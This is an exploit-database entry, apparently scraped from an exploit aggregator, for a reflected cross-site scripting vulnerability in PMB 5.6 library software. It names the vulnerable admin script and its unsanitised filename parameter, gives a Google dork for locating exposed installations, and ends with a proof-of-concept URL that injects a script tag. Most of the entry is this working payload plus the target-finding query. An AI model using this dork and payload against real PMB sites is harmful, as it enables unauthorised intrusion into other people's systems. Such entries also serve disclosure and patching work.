Exploit for PMB 5.6 Cross Site Scripting Vulnerability

Name: Exploit for PMB 5.6 Cross Site Scripting Vulnerability
Rating: 5 (522 reviews)

2020-07-19 | CVSS 0.1

## https://sploitus.com/exploit?id=1337DAY-ID-34705
# Exploit Title: PMB 5.6 Cross Site Scripting XSS
# Google Dork: inurl:opac_css
# Exploit Author: 41-trk (Tarik Bakir)
# Email: tarikbak999[at]gmail.com
# Vendor Homepage: http://www.sigb.net
# Software Link: http://forge.sigb.net/redmine/projects/pmb/files
# Affected versions : <= 5.6 

-==== Vulnerability ====-


Variable $filename isn't properly sanitized in file /admin/sauvegarde/restaure.php.


-==== POC ====-

http://localhost/[PMB_PATH]//admin/sauvegarde/restaure.php?filename="><script>alert(1)</script>&critical=1

================================

#  0day.today [2020-07-19]  #